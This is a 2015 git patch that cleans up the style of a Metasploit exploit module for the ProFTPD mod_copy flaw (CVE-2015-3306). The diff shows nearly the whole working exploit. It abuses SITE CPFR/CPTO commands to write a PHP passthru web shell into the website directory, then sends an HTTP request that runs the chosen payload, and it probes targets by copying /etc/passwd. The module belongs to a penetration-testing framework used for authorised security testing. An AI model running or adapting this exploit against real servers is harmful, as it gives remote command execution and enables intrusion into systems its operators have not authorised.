From 5ab882a8d4c2647a91e7424adb3c47cf02cf8591 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 9 Jun 2015 13:58:01 -0500
Subject: [PATCH] Clean up module

---
 .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 47 ++++++++++---------
 1 file changed, 24 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
index 8d803b2338..5fc7f62908 100644
--- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
+++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
@@ -30,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2015-3306'],
+          [ 'CVE', '2015-3306' ],
           [ 'EDB', '36742' ],
         ],
       'Privileged'     => false,
@@ -57,91 +58,91 @@ class Metasploit3 < Msf::Exploit::Remote
         OptPort.new('RPORT', [true, 'HTTP port', 80]),
         OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
         OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
+        OptString.new('TMPPATH', [true, 'Absolute writable/executable path', '/tmp']),
         OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
       ], self.class)
   end
 
   def check
     ftp_port = datastore['RPORT_FTP']
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
 
     if sock.nil?
-      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
     else
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /220/ )
+    unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
 
     sock.puts("SITE CPFR /etc/passwd\r\n")
     res = sock.get_once(-1,10)
-    if res and res =~ /350/
-      return Exploit::CheckCode::Vulnerable
+    if res && res.include?('350')
+      Exploit::CheckCode::Vulnerable
     else
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 
   def exploit
-
     ftp_port = datastore['RPORT_FTP']
     get_arg = rand_text_alphanumeric(5+rand(3))
     payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
 
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
 
     if sock.nil?
-      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
     else
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /220/ )
+    unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
 
-    print_status("#{rhost}:21 - Sending copy commands to FTP server")
+    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
 
     sock.puts("SITE CPFR /proc/self/cmdline\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /350/ )
+    unless res && res.include?('350')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
     end
 
-    sock.put("SITE CPTO /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /250/ )
+    unless res && res.include?('250')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
     end
 
-    sock.put("SITE CPFR /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /350/ )
+    unless res && res.include?('350')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
     end
 
     sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /250/ )
+    unless res && res.include?('250')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
     end
 
     sock.close
 
     print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
-    res = send_request_cgi!({
+    res = send_request_cgi!(
       'uri' => normalize_uri(target_uri.path, payload_name),
       'method' => 'GET',
       'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
-    })
+    )
 
-    unless ( res and res.code == 200 )
-      fail_with(Failure::Unknown, "#{rhost}:21 - Failure executing payload")
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
     end
-
   end
+
 end